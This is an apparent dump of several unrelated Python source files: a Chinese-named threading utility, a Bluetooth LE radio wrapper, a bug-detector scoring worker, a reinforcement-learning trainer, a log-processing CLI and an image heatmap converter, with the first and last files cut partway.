def 进入(self):
self.lock.acquire()
@异常处理返回类型逻辑型
def 退出(self):
self.lock.release()
class 事件锁:
def __init__(self):
self.lock = threading.Event()
@异常处理返回类型逻辑型
def 通行(self):
self.lock.set()
@异常处理返回类型逻辑型
def 堵塞(self):
self.lock.clear()
@异常处理返回类型逻辑型
def 等待(self):
'这里会判断事件状态,如果为通行状态则继续向下运行,否则会一直等待'
self.lock.wait()
class 线程:
def __init__(self):
import threading as 线程
self.__线程 = 线程
self.__线程列表 = []
@异常处理返回类型逻辑型
def 启动线程(self, 函数名, 参数=(), 跟随主线程结束=False):
"成功返回线程对象,参数用元组形式传入,daemon属性为False,主线程结束时会检测该子线程是否结束"
线程 = self.__线程.Thread(target=函数名, args=参数, daemon=跟随主线程结束)
线程.start()
self.__线程列表.append(线程)
return 线程
@异常处理返回类型逻辑型
def 等待线程结束(self, 最长等待时间=0):
'顺利结束返回True如果启动线程参数daemon设置为True,则可以设置最长等待时间,超过时间强制结束线程'
for i in self.__线程列表:
if 最长等待时间 <= 0:
i.join()
else:
i.join(最长等待时间)
return True
@异常处理返回类型逻辑型
def 取运行中的线程对象(self):
return self.__线程.enumerate()
@异常处理返回类型逻辑型
def 线程是否在运行(self, 线程对象):
'返回True或False'
return 线程对象.is_alive()
@异常处理返回类型逻辑型
def 取运行的线程数(self):
'只返回该类创建后使用该类启动线程创建的线程数量'
for x in self.__线程列表:
if x.is_alive() == False:
self.__线程列表.remove(x)
return len(self.__线程列表)
# 过时的库不用了
# import threadpool
# class 线程池(threadpool.ThreadPool):
# def __init__(self, 工作线程数量, 队列数量=0):
# """
# 创建线程池
# 工作线程数量 线程池的线程数量
# 队列数量 为投递任务时队列的数量
# """
# super().__init__(工作线程数量, q_size=队列数量, resq_size=0, poll_timeout=5)
#
# @异常处理返回类型逻辑型
# def 投递任务(self, 任务函数, 参数, 等待时间=None):
# """投递一个任务函数到线程池任务队列中。"""
# requests = threadpool.makeRequests(任务函数, [参数])
# for req in requests:
# self.putRequest(req, True, 等待时间)
#
# def 等待(self):
# """等待所有任务完成"""
# self.wait()
def 线程_取活动对象数():
"""
返回Thread当前活动的对象数。返回的计数等于所返回列表的长度
"""
return threading.active_count()
def 线程_取当前线程():
"""
返回与Thread调用方的控制线程相对应的当前对象。如果未通过threading模块创建调用者的控制 线程,则返回功能有限的虚拟线程对象。
"""
return threading.current_thread()
def 线程_取线程标识符():
"""
返回当前线程的“线程标识符”。这是一个非零整数。它的值没有直接的意义。它旨在用作魔术Cookie,例如用于索引线程特定数据的字典。当一个线程退出并创建另一个线程时,线程标识符可以被回收。
"""
return threading.get_ident()
def 线程_取所有活动对象():
"""
返回Thread当前所有活动对象的列表。该列表包括守护线程,由创建的伪线程对象 current_thread()和主线程。它不包括终止的线程和尚未启动的线程。
"""
return threading.enumerate()
def 线程_取主线程():
"""
返回主要Thread对象。在正常情况下,主线程是启动Python解释器的线程。
"""
return threading.main_thread()
def 取当前线程名称():
return current_thread().name
class 线程池(ThreadPoolExecutor):
"""
当有大量并发任务需要处理时,再使用传统的多线程就会造成大量的资源创建销毁导致服务器效率的下降。这时候,线程池就派上用场了。线程池技术为线程创建、销毁的开销问题和系统资源不足问题提供了很好的解决方案。
用法
def 线程初始化(data):
print("初始化", data, 取当前线程名称())
互斥锁 = 互斥锁()
def 任务函数(i):
time.sleep(1)
互斥锁.进入()
print(i)
互斥锁.退出()
return "返回参数" + str(i)
def 任务完成(future):
print("当前线程", 取当前线程名称())
print("future", future.result())
任务池 = 线程池(4, "pyefun", 线程初始化, [0])
for url in range(10):
future = 任务池.投递任务(任务函数, url)
任务池.设置任务结束回调函数(future, 任务完成)
任务池.等待()
"""
def __init__(self, 最大线程数量, 线程名称前缀='',
线程初始化函数=None, 初始化函数参数=()):
"""
创建线程池
:param 最大线程数量:
:param 线程名称前缀:
:param 线程初始化函数:
:param 初始化函数参数:
"""
super().__init__(
max_workers=最大线程数量,
thread_name_prefix=线程名称前缀,
initializer=线程初始化函数,
initargs=初始化函数参数
)
def 投递任务(self, *任务函数, **传入参数):
"""
投递任务
:param 任务函数:
:param 传入参数:
:return: Future 对象可以 设置任务结束回到函数
"""
Future = self.submit(*任务函数, **传入参数)
return Future
def 设置任务结束回调函数(self, future, 回到函数):
"""
投递任务返回的对象
def 回到函数(线程返回的结果):
print("当前线程", current_thread().name)
print("线程返回的结果", future.result())
"""
future.add_done_callback(回到函数)
def 等待(self):
self.shutdown(True)
def 批量投递任务(self, 任务函数, *任务参数数组, 超时=None, chunksize=1):
"""
批量投递任务 不能设置回到函数
:param 任务函数:
:param 任务参数数组:
:param 超时:
:param chunksize:
:return:
"""
return self.map(任务函数, *任务参数数组, timeout=超时, chunksize=chunksize)
|
Bluetooth.py
|
from comlocal.util import Properties
import Radio
import json
import bluetooth
import bluetooth._bluetooth as _bt
import struct
import socket
import errno
import threading
import subprocess
import os
from ctypes import (CDLL, get_errno)
from ctypes.util import find_library
from socket import (
timeout,
socket,
AF_BLUETOOTH,
SOCK_RAW,
BTPROTO_HCI,
SOL_HCI,
HCI_FILTER,
)
import pdb
class Bluetooth (Radio.Radio):
"""
Abstracts all communication over Bluetooth / BLE
All communication is broadcast
"""
def __init__ (self):
super(Bluetooth, self).__init__(self._setupProperties())
self._name = 'BT'
btlib = find_library("bluetooth")
if not btlib:
raise Exception(
"Can't find required bluetooth libraries"
" (need to install bluez)"
)
self._bluez = CDLL(btlib, use_errno=True)
dev_id = self._bluez.hci_get_route(None)
self._sock = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI)
self._sock.bind((dev_id,))
err = self._bluez.hci_le_set_scan_parameters(self._sock.fileno(), 0, 0x10, 0x10, 0, 0, 1000);
if err < 0:
raise Exception("Set scan parameters failed")
# occurs when scanning is still enabled from previous call
# allows LE advertising events
hci_filter = struct.pack(
"<IQH",
0x00000010,
0x4000000000000000,
0
)
self._sock.setsockopt(SOL_HCI, HCI_FILTER, hci_filter)
self._sock.settimeout(.05)
# self._port = 0x2807 #10247
# self._sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
# self._sock.settimeout(.05)
# self._sock.bind(("", self._port))
# self._sock.listen(5) #allow multiple connections
# self._readQ = Queue.Queue()
# self._readThread = threading.Thread(target=self._backgroundRead)
#
def __del__(self):
self._sock.close()
def start(self):
FNULL = open(os.devnull, 'w')
onCmd = 'hcitool -i hci0 cmd 0x08 0x000C 0x01 0x00'
try:
subprocess.call(onCmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
except Exception as e:
raise e
def stop(self):
FNULL = open(os.devnull, 'w')
offCmd = 'hcitool -i hci0 cmd 0x08 0x000C 0x00 0x00'
try:
subprocess.call(offCmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
except Exception as e:
raise e
def _setupProperties(self):
"""
Set up the radio properties we might need
"""
props = Properties.Properties()
props.addr = self._getAddress()
props.maxPacketLength = 72
props.costPerByte = 1
return props
#
def _getAddress(self):
get_byte = ord
hci_sock = _bt.hci_open_dev(0)
old_filter = hci_sock.getsockopt( _bt.SOL_HCI, _bt.HCI_FILTER, 14)
flt = _bt.hci_filter_new()
opcode = _bt.cmd_opcode_pack(_bt.OGF_INFO_PARAM,
_bt.OCF_READ_BD_ADDR)
_bt.hci_filter_set_ptype(flt, _bt.HCI_EVENT_PKT)
_bt.hci_filter_set_event(flt, _bt.EVT_CMD_COMPLETE);
_bt.hci_filter_set_opcode(flt, opcode)
hci_sock.setsockopt( _bt.SOL_HCI, _bt.HCI_FILTER, flt )
_bt.hci_send_cmd(hci_sock, _bt.OGF_INFO_PARAM, _bt.OCF_READ_BD_ADDR )
pkt = hci_sock.recv(255)
status,raw_bdaddr = struct.unpack("xxxxxxB6s", pkt)
assert status == 0
t = [ "%X" % get_byte(b) for b in raw_bdaddr ]
t.reverse()
bdaddr = ":".join(t)
# restore old filter
hci_sock.setsockopt( _bt.SOL_HCI, _bt.HCI_FILTER, old_filter )
return bdaddr
# def _backgroundRead(self):
# while self._threadRunning:
# client_sock = None
# try:
# #TODO: FIX THIS!!! THIS IS BLOCKING SO WE CAN NEVER END THIS SHIT
# client_sock,address = self._sock.accept()
# data = client_sock.recv(self.getProperties().maxPacketLength)
# tmp = json.loads(data)
# tmp['sentby'] = address[0] #want the address
# pdb.set_trace()
# self._readQ.put(tmp)
# except bluetooth.btcommon.BluetoothError as e:
# if 'timed out' not in e:
# raise e
# finally:
# if client_sock is not None:
# client_sock.close()
# #
# #
def read(self):
"""
Read from radio and return json object
Non blocking
"""
msg = None
try:
data = self._sock.recv(1024)
if 'type' in data:
# print bluetooth address from LE Advert. packet
msg = json.loads(''.join(x for x in data[21:-1]))
addr = ':'.join("{0:02x}".format(ord(x)) for x in data[12:6:-1])
msg['sentby'] = addr
except timeout:
pass
return msg
#
def write(self, data):
"""
write json object to radio
"""
FNULL = open(os.devnull, 'w')
payload = ' '.join("{0:02X}".format(ord(x)) for x in self._asString(data))
length = ''.join("{0:02X}".format(len(payload.split()) + 3))
total = ''.join("{0:02X}".format(len(payload.split()) + 7))
msgCmd = 'hcitool -i hci0 cmd 0x08 0x0008 ' + total + ' 02 01 1A ' + length + ' FF 4C 00 ' + payload
onCmd = 'hcitool -i hci0 cmd 0x08 0x000a 01'
offCmd = 'hcitool -i hci0 cmd 0x08 0x000a 00'
try:
subprocess.call(msgCmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
subprocess.call(onCmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
subprocess.call(offCmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
except Exception as e:
raise e
#
#
#
|
detectordatascoringworker.py
|
import argparse
import logging
import math
import time
from itertools import cycle, islice
from tempfile import TemporaryDirectory
from threading import Thread
from typing import NoReturn
import msgpack
import torch
import zmq
from dpu_utils.utils import run_and_debug
from tqdm import tqdm
from buglab.controllers.helper.dummydatageneratingpipeline import get_data_from_folder
from buglab.data.modelsync import MockModelSyncClient, ModelSyncClient
from buglab.utils.logging import MetricProvider, configure_logging
from buglab.utils.replaybuffer import ReplayBuffer
metric_provider = MetricProvider("DetectorDataScoringWorker")
def queue_loader(replay_buffer: ReplayBuffer, data_pipeline_address: str) -> NoReturn:
"""A thread adding the received data into a queue."""
context = zmq.Context.instance()
subscriber = context.socket(zmq.SUB)
subscriber.connect(data_pipeline_address)
subscriber.setsockopt_string(zmq.SUBSCRIBE, "")
incoming_counter = metric_provider.new_counter(counter_name="incoming_messages")
delay_measure = metric_provider.new_latency_measure(measure_name="incoming_latency")
tracer = metric_provider.get_tracer()
while True:
with tracer.start_as_current_span("enqueue"), delay_measure:
data = subscriber.recv()
incoming_counter.inc()
replay_buffer.add(msgpack.loads(data))
def hydrate_replay_buffer(replay_buffer, path, num_elements):
for sample in tqdm(
islice(get_data_from_folder(path), num_elements),
desc="Hydrating replay buffer",
):
replay_buffer.add(sample)
LOGGER = logging.getLogger(__name__)
def run(args):
tracer = metric_provider.get_tracer()
model_device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(f"Using {model_device}.")
if args.fixed_model_path is not None:
model_sync_client = MockModelSyncClient(args.fixed_model_path)
else:
model_sync_client = ModelSyncClient(args.model_server_address, do_not_update_before_sec=5 * 60)
model, nn = model_sync_client.ask(model_device)
nn.eval()
tmp = TemporaryDirectory()
replay_gauge = metric_provider.new_gauge("replay_buffer_incoming_queue")
replay_buffer = ReplayBuffer(backing_dir=tmp.name, gauge=replay_gauge, ttl=10)
data_input_thread = Thread(target=lambda: queue_loader(replay_buffer, args.data_pipeline_address), daemon=True)
data_input_thread.start()
hydration_thread = Thread(
target=lambda: hydrate_replay_buffer(replay_buffer, args.initial_data_hydration_path, args.replay_buffer_size),
name="replay_buffer_hydration_thread",
daemon=True,
)
hydration_thread.start()
time.sleep(20) # Wait for buffer to be filled a bit.
# The results are placed in a queue of another process. We model this as a synchronous request.
context = zmq.Context.instance()
socket = context.socket(zmq.REQ)
socket.connect(args.target_queue_address)
poller = zmq.Poller()
poller.register(socket, zmq.POLLIN)
outgoing_counter = metric_provider.new_counter(counter_name="outgoing_messages")
queue_delay_measure = metric_provider.new_latency_measure("outgoing_latency")
processing_time_measure = metric_provider.new_latency_measure("processing_time")
for _ in tqdm(cycle(range(10))): # while True:
with tracer.start_as_current_span("Processing data point."):
with tracer.start_as_current_span("Waiting for data."):
data = list(replay_buffer.iter_batch(1))[0]
processing_time_measure.start()
with tracer.start_as_current_span("Getting ready for scoring."):
graphs, rewrite_idxs = [], []
for rewrite_idx, (graph, _) in data["rewrites"].items():
if rewrite_idx == "NO_BUG":
rewrite_idxs.append(-1)
else:
rewrite_idxs.append(int(rewrite_idx))
if graph is None:
LOGGER.error(f"None element for graph. Rewrite_idx: {rewrite_idx}")
continue
graphs.append(graph)
assert len(rewrite_idxs) == len(set(rewrite_idxs))
original_graph = data["original"]
num_rewrite_candidates = len(original_graph["graph"]["reference_nodes"])
discriminator_rewrite_logprobs = [-math.inf] * (num_rewrite_candidates + 1) # +1 for the NO_BUG case
with tracer.start_as_current_span("Scoring."):
model_sync_client.update_params_if_needed(nn, model_device)
predictions = model.predict(graphs, nn, model_device, parallelize=not args.sequential)
predictions = list(predictions)
with tracer.start_as_current_span("Processing scores."):
for i, (datapoint, location_logprobs, rewrite_logprobs) in enumerate(predictions):
target_fix_action_idx = datapoint["target_fix_action_idx"]
if target_fix_action_idx is None:
target_logprob = location_logprobs[-1]
else:
ground_node_idx = datapoint["graph"]["reference_nodes"][target_fix_action_idx]
target_logprob = (
location_logprobs[ground_node_idx] + rewrite_logprobs[target_fix_action_idx]
)
discriminator_rewrite_logprobs[rewrite_idxs[i]] = float(
target_logprob
) # Can't serialise numpy.float32 objects.
original_graph["candidate_rewrite_logprobs"] = discriminator_rewrite_logprobs
processing_time_measure.stop()
with queue_delay_measure:
with tracer.start_as_current_span("Sending detection scores data."):
serialized_graph = msgpack.dumps(original_graph)
socket.send(serialized_graph)
outgoing_counter.inc()
with tracer.start_as_current_span("Waiting for confirmation of receipt."):
if poller.poll(60 * 1000): # 1min
if not bool(socket.recv()):
LOGGER.warning(f"Error accepting data from {__package__}.")
else:
LOGGER.error(f"Timeout for sending data.")
socket.close()
socket = context.socket(zmq.REQ)
socket.connect(args.target_queue_address)
poller = zmq.Poller()
poller.register(socket, zmq.POLLIN)
if __name__ == "__main__":
configure_logging()
parser = argparse.ArgumentParser(
description="Score original/buggy code adding the bug detection probabilities and forward the data to the bug selector training."
)
parser.add_argument(
"initial_data_hydration_path",
type=str,
help="The path to hydrate the replay buffer upon startup.",
)
parser.add_argument(
"--data-pipeline-address",
type=str,
default="tcp://localhost:5558",
help="The zmq address to the data generating pipeline.",
)
parser.add_argument(
"--replay-buffer-size",
type=int,
default=10000,
help="The number of elements to pre-load in the replay buffer.",
)
parser.add_argument(
"--target-queue-address",
type=str,
default="tcp://localhost:5559",
help="The zmq address to the data accumulator queue.",
)
parser.add_argument(
"--model-server-address",
type=str,
default="tcp://localhost:6000",
help="The address to the bug detector model server.",
)
parser.add_argument(
"--fixed-model-path",
type=str,
help="Use a fixed discriminator model, instead of asking for one from the server.",
)
parser.add_argument(
"--prometheus-server-port",
type=int,
default=8000,
help="The address to the prometheus server.",
)
parser.add_argument(
"--enable-tracing",
action="store_true",
help="Set to enable recording tracing information.",
)
parser.add_argument(
"--sequential",
action="store_true",
help="Should any computations happen sequentially?",
)
parser.add_argument(
"--debug",
action="store_true",
help="Debug on exception.",
)
args = parser.parse_args()
metric_provider.start_server(args.prometheus_server_port)
metric_provider.set_tracing(args.enable_tracing)
run_and_debug(lambda: run(args), args.debug)
|
trainer.py
|
# -*- coding: utf-8 -*-
# @Time : 2020-01-31 22:18
# @Author : Enjoy Zhao
# @Describe :本文件是定义了一个训练器方法类,在训练器中定义了训练函数,包括单实例和多实例训练,强化学习的训练是在训练模拟器中完成的。
import multiprocessing as mp
from collections import namedtuple
import tensorflow as tf
import cloudpickle
from general.core import GrEexception
from general.memory import Transition
#定义全局变量RewardState
RewardState=namedtuple('RewardState',['reward','state'])
#定义Trainer方法类,实现在训练器的训练功能
class Trainer:
#定义初始化方法,将create_env、agent、mapping进行初始化
def __init__(self,create_env,agent,mapping=None):
self.create_env=create_env
self.agent=agent
self.mapping=mapping
#定义train方法,根据配置对智能体进行训练
def train(self,max_steps=1000,instances=1,visualize=False,plot=None,max_subprocesses=0):
#将智能体设置为训练状态
self.agent.training=True
#如果是单进程训练,则调用_sp_train方法,如果是多进程训练则调用_mp_train方法
if max_subprocesses==0:
self._sp_train(max_steps,instances,visualize,plot)
elif max_subprocesses is None or max_subprocesses>0:
self._mp_train(max_steps,instances,visualize,plot,max_subprocesses)
else:
raise GrEexception(f"Invalid max_subprocesses setting: {max_subprocesses}")
#定义单进程训练方法
def _sp_train(self, max_steps, instances, visualize=False, plot=None):
"""
:param max_steps:最大训练步数
:param instances:训练智能体的数量
:param visualize:配置是否图形可视化,针对与gym适用
:param plot:画图函数,对训练步数和rewards进行画图
"""
#根据设置的instances的数量也就是智能体的数量,分别初始化reward、step、envs、states,用于训练过程的图形化展示
episode_reward_sequences=[[0] for _ in range(instances)]
episode_step_sequences=[[0] for _ in range(instances)]
episode_rewards=[0]*instances
envs=[self.create_env for _ in range(instances)]
states=[env.reset() for env in envs]
#训练步数在最大步数范围内开始循环训练
for step in range(max_steps):
#根据智能体的数量和是否进行图形可视化,进行环境可视化,这里只适用于gym环境
for i in range(instances):
if visualize:envs[i].render()
#将预测得到的action从Tensor转换为数值
action = tf.keras.backend.eval(self.agent.act(states[i], i))
#将预测得到的action输入给环境,获得环境反馈的下一个状态、reward、和是否结束的标记
next_state,reward,done, _=envs[i].step(action=action)
#将环境返回的数据、action作为一条记录保存到记忆存储器中
self.agent.push(Transition(states[i],action,reward,None if done else next_state),i)
#将reward进行累加
episode_rewards[i]+=reward
#如果环境给予结束的状态则将episode_rewards、训练步数给保存,episode_rewards清零后进行图形展示,如果不是结束状态则将状态更新为下一个状态。
if done:
episode_reward_sequences[i].append(episode_rewards[i])
episode_step_sequences[i].append(step)
episode_rewards[i]=0
if plot:
plot(episode_reward_sequences,episode_step_sequences)
states[i]=envs[i].reset()
else:
states[i]=next_state
#训练智能体,完成一步的训练
self.agent.train(step)
# 最后图形化展示整个训练过程的reward
if plot:plot(episode_reward_sequences,episode_step_sequences,done=True)
#定义多进程训练方法,涉及到多进程调度、通信等过程,相对实现起来比较复杂。
def _mp_train(self,max_steps,instances,visualize,plot,max_subprocesses):
#如果最大子进程数量没有设置,则根据cpu的数量来作为最大子进程数量
if max_subprocesses is None:
max_subprocesses=mp.cpu_count()
#智能体的数量和最大子进程的数量取最小值
nprocesses=min(instances,max_subprocesses)
#计算每一个进程中智能体的数量
instances_per_process=[instances//nprocesses] * nprocesses
#计算左侧溢出的智能体,也就是排队的智能体
leftover=instances%nprocesses
#如果有智能体排队,则均匀的分配排队智能体的数量
if leftover>0:
for i in range(leftover):
instances_per_process[i]+=1
#计算智能体的id,通过枚举的方式逐个获得智能体的id
instance_ids=[list(range(i,instances,nprocesses))[:ipp] for i ,ipp in enumerate(instances_per_process)]
#初始化一个pipes和processes数组,用于存储等待状态或者中间状态的数据
pipes=[]
processes=[]
#逐个将智能体实例调度到不同的子进程中,等待训练。
for i in range(nprocesses):
child_pipes=[]
#以下过程是将不同的智能体装入到子进程中的过程。
for j in range(instances_per_process[i]):
#获得父进程和子进程的pipe
parent,child=mp.Pipe()
#将进程和子进程的pipe保存到各自的数组中
pipes.append(parent)
child_pipes.append(child)
#将多个智能体以及训练参数装入到子进程中,这里的训练函数使用的是专门为多进程训练编写的函数,具体过程见_train
pargs=(cloudpickle.dumps(self.create_env),instance_ids[i],max_steps,child_pipes,visualize)
processes.append(mp.Process(target=_train,args=pargs))
print(f"Starting {nprocesses} process(es) for {instances} environment instance(s)... {instance_ids}")
#启动所有的进程开始训练
for p in processes:p.start()
# 根据设置的instances的数量也就是智能体的数量,分别初始化reward、step、envs、states,用于训练过程的图形化展示
episode_reward_sequences = [[] for _ in range(instances)]
episode_step_sequences = [[] for _ in range(instances)]
episode_rewards = [0] * instances
#初始化rss和last_actions
rss=[None]*instances
last_actions=[None]*instances
#开始在最大训练步数范围进行循环训练
for step in range(max_steps):
#初始化完成训练的数量,全部初始化为未完成训练
step_done=[False]*instances
#如果没有全部完成训练,则需要进行等待,直到全部完成训练。
while sum(step_done)<instances:
#获得需要等待完成完成训练的子进程
awaiting_pipes=[p for iid,p in enumerate(pipes) if step_done[iid]==0]
#获得已经完成训练的awaiting_pipes
ready_pipes=mp.connection.wait(awaiting_pipes,timeout=None)
#获得完成训练的子进程的idex
pipe_indexes=[pipes.index(rp) for rp in ready_pipes]
#对完成训练的子进程idex进行排序
pipe_indexes.sort()
#将完成训练的进程中环境状态、action、reward、下一步的状态存储到智能体记忆存储器中
for iid in pipe_indexes:
#从进程间管道中接收信息
rs =pipes[iid].recv()
if rss[iid] is not None:
exp=Transition(rss[iid].state,last_actions[iid],rs.reward,rs.state)
self.agent.push(exp,iid)
#将训练结束状态标记为True
step_done[iid]=True
rss[iid]=rs
#如果环境给予结束的状态则将episode_rewards、训练步数给保存,episode_rewards清零后进行图形展示
if rs.state is None:
rss[iid]=None
episode_reward_sequences[iid].append(episode_rewards[iid])
episode_step_sequences[iid].append(step)
episode_rewards[iid]=0
if plot:
plot(episode_reward_sequences,episode_step_sequences)
#如果不是结束状态则获得智能体的执行动作,并更新last_action,同时通过管道将action发送出去。
else:
action=self.agent.act(rs.state,iid)
last_actions[iid]=action
try:
pipes[iid].send(action)
except BrokenPipeError as bpe:
if step <(max_steps-1):raise bpe
#如果在管道中还能接收到reward则将episode_rewards[iid]进行更新
if rs.reward:episode_rewards[iid]+=rs.reward
#训练智能体,完成一步训练
self.agent.train(step)
#最后图形化展示整个训练过程的reward
if plot:plot(episode_reward_sequences, episode_step_sequences, done=True)
#定义测试方法,对完成训练的智能体进行测试
def test(self,max_steps,visualize=True):
#将智能体的网络设置测试状态
self.agent.training=False
#创建环境并初始化
env=self.create_env()
state=env.reset()
#在最大测试步数范围测试智能体与环境的交互
for step in range(max_steps):
if visualize:env.render()
action=tf.keras.backend.eval(self.agent.act(state))
next_state,reward,done,_=env.step(action)
state=env.reset() if done else next_state
#定义多进程训练方法,其中涉及到来训练过程的进程间通信
def _train(create_env,instance_ids,max_steps,pipes,visualize):
#根据智能体的数量初始化pipes、actions、envs
pipes={iid:p for iid,p in zip(instance_ids,pipes)}
actions={iid:None for iid in instance_ids}
create_env=cloudpickle.loads(create_env)
envs={iid:create_env for iid in instance_ids}
#获得各个智能体对应环境的初始状态,并通过pipes管道进行进程间通信
for iid in instance_ids:
state=envs[iid].reset()
pipes[iid].send(RewardState(None,state))
#在最大训练步数的范围,开始进行循环训练
for step in range(max_steps):
for iid in instance_ids:
#从管道中接收数据,更新actions
actions[iid]=pipes[iid].recv()
#如果需要图像可视化,则展示环境的可视化,适用于gym
if visualize: envs[iid].render()
#将获得的action输入环境中获得next_state,reward,done
next_state,reward,done,_=envs[iid].step(actions[iid])
#将RewardState通过管道发送出去
pipes[iid].send(RewardState(reward,None if done else next_state))
#如果环境终止来,则将环境初始化,并发送RewardState
if done:
state=envs[iid].reset()
pipes[iid].send(RewardState(None,state))
|
main.py
|
# coding=UTF-8
import time
from Src.Core import OutputCustomer,Reader,Base
from multiprocessing import Process
from threading import Thread
from webServer.start import start_web
import multiprocessing,os,click
def runReader(log_files_conf,config_name):
r = Reader(log_file_conf=log_files_conf ,config_name=config_name)
pushQueue = ['pushDataToQueue'] * multiprocessing.cpu_count()
jobs = ['readLog','cutFile'] + pushQueue
t = []
for i in jobs:
th = Thread(target=r.runMethod, args=(i, ))
t.append(th)
for i in t:
i.start()
for i in t:
i.join()
def customer( config_name ):
OutputCustomer(config_name).saveToStorage()
def analysis(confg_name):
OutputCustomer(confg_name).watchTraffic()
def getLogFilsDict(base):
logFiles = []
for i in list(base.conf):
if 'inputer.log_file' in i:
item = dict(base.conf[i])
item['app_name'] = i.split('.')[-1]
logFiles.append(item)
return logFiles
def startInputer(base , config):
logFiles = getLogFilsDict(base)
plist = []
for i in logFiles:
p = Process(target=runReader, args=(i, config,))
plist.append(p)
for i in plist:
i.start()
for i in plist:
i.join()
def startOutputer(base , config):
p_list = []
for start_webi in range(int(base.conf['outputer']['worker_process_num'])):
p = Process(target=customer, args=(config,))
p_list.append(p)
for i in p_list:
i.start()
for i in p_list:
i.join()
@click.command()
@click.option('-r', '--run', help="run type" ,type=click.Choice(['inputer', 'outputer','traffic','web']))
@click.option('-s', '--stop', help="stop the proccess" ,type=click.Choice(['inputer', 'outputer']))
@click.option('-c', '--config', help="config file name" )
def enter(run,stop,config):
if (config == None):
print('please use "-c" to bind config.ini file')
exit()
base = Base(config_name=config)
if (run == 'inputer'):
pid = os.fork()
if pid > 0 :
exit()
else:
startInputer(base, config)
if (run == 'outputer'):
pid = os.fork()
if pid > 0:
exit()
else:
startOutputer(base, config)
if (run == 'traffic'):
analysis(config)
if (run == 'web'):
web_conf = dict(base.conf['web'])
web_conf[web_conf['data_engine']] = dict(base.conf[web_conf['data_engine']])
start_web(web_conf)
if (stop ):
if isinstance(config,str) and len(config) :
cmd = 'ps -ax | grep "main.py -r %s -c %s"' % (stop, config)
else:
cmd = 'ps -ax | grep "main.py -r %s"' % stop
res = os.popen(cmd)
pids = []
print('|============================================================')
for i in res.readlines():
if i.find('grep') != -1:
continue
print('| %s ' % i.strip())
pids.append(i.strip().split(' ')[0])
if len(pids) == 0:
print('| %s is not running ' % stop)
print('|============================================================')
exit('nothing happened . bye bye !')
print('|============================================================')
confirm = input('confirm: please enter [ yes | y ] or [ no | n ] : ')
if confirm in ['yes','y'] and len(pids) > 0:
os.popen('kill %s' % ' '.join(pids))
exit('pid: %s was killed and %s is stoped. bye bye !' % (' '.join(pids) ,stop) )
else:
exit('nothing happened . bye bye !')
if __name__ == "__main__":
enter()
|
points_to_heatmaps.py
|
import json
import numpy as np
from skimage.draw import line
from pathlib import Path
import pdb
import cv2
import math
import matplotlib.pyplot as plt
import os
import shutil
from time import sleep
import multiprocessing
import time
import pdb
from .helper import get_labels, replace_values
from fastprogress.fastprogress import progress_bar
from skimage.morphology.convex_hull import convex_hull_image
class LABELS_TO_HEATMAPS_COMVERTER:
def __init__(self, root_path, img_path, json_path, features, target_size=512, image_ext="png",
scales=[0.0],crop_margin=0, file_name_function=None, final_images_path="final_images",
painted_images_path=None, convex_hull_features=[],hull_path="hull",
replacements=None, process_output_image=None, mask_dilation=1, save_output_img=True):
self.__root_path=root_path
self.__convex_hull_features = convex_hull_features
self.__img_path=img_path
self.__hull_path = hull_path
self.mask_dilation = mask_dilation
self.__json_path=json_path
self.__features=features
self.__final_images_path=final_images_path
self.__painted_images_path=painted_images_path
self.__replacements = replacements
self.__image_ext=image_ext
self.__target_size=target_size
self.__scales = scales
self.__crop_margin=crop_margin
self.__save_output_img = save_output_img
self.__process_output_image = process_output_image
self.__file_name_function = file_name_function if file_name_function is not None else lambda label, image_ext: label["Labeled Data"]+ "."+ image_ext
def process(self):
labels = json.load(open(self.__root_path/self.__json_path,"r"))
self.manage_folders()
replace_values(labels, self.__replacements)
self.new_process(labels)
def process_multithread(self):
raise("`process_multithread` is not working now")
starttime = time.time()
labels = json.load(open(self.__json_path,"r"))
self.manage_folders()
replace_values(labels, self.__replacements)
cpu_count = round(multiprocessing.cpu_count()/2)
imgs_pre_thread = round(len(labels) / cpu_count)
idx = 1
processes = []
labels_for_thread = []
for label in labels:
labels_for_thread.append(label)
if idx%imgs_pre_thread == 0:
p = multiprocessing.Process(target=worker.new_process, args=(labels_for_thread,))
processes.append(p)
labels_for_thread = []
idx=1
else:
idx+=1
if len(labels_for_thread)< imgs_pre_thread:
p = multiprocessing.Process(target=worker.new_process, args=(labels_for_thread,))
processes.append(p)
for process in processes:
process.start()
for process in processes:
process.join()
print('That took {} seconds'.format(time.time() - starttime))
def manage_folders(self):
if self.__save_output_img:
if os.path.exists(self.__root_path/self.__final_images_path):
shutil.rmtree(self.__root_path/self.__final_images_path)
sleep(0.1)
os.mkdir(self.__root_path/self.__final_images_path)
if self.__painted_images_path is not None:
if os.path.exists(self.__root_path/self.__painted_images_path):
shutil.rmtree(self.__root_path/self.__painted_images_path)
sleep(0.1)
os.mkdir(self.__root_path/self.__painted_images_path)
if os.path.exists(self.__root_path/self.__hull_path):
shutil.rmtree(self.__root_path/self.__hull_path)
sleep(0.1)
os.mkdir(self.__root_path/self.__hull_path)
for key in self.__features.keys():
if os.path.exists(self.__root_path/key):
shutil.rmtree(self.__root_path/key)
sleep(0.1)
os.mkdir(self.__root_path/key)
def get_all_points(self,all_pts):
all_points = np.array([[0,0]])
for key in all_pts.keys():
if len(all_pts[key]) > 0:
all_points = np.concatenate((all_points,all_pts[key]))
return np.delete(all_points,0,axis=0).astype(np.int)
def adjust_labels_zoomed(self,label_data, x_diff, y_diff):
new_label_data = {}
for key in label_data.keys():
new_label_data[key] = []
for point in label_data[key]:
new_label_data[key].append((point[0] - x_diff,point[1] - y_diff))
new_label_data[key] = np.array(new_label_data[key])
return new_label_data
def adjust_labels_squared(self,label_data, value, orientation):
new_label_data = {}
for key in label_data.keys():
new_label_data[key] = []
for point in label_data[key]:
new_x = point[0] - value if orientation == "landscape" else point[0]
new_y = point[1] if orientation == "landscape" else point[1] - value
new_label_data[key].append((new_x,new_y))
new_label_data[key] = np.array(new_label_data[key])
return new_label_data
def adjust_labels_sized(self,label_data, old_square_shape, new_square_shape):
new_label_data = {}
for key in label_data.keys():
new_label_data[key] = []
for point in label_data[key]:
new_x = round(new_square_shape*(point[0]/old_square_shape))
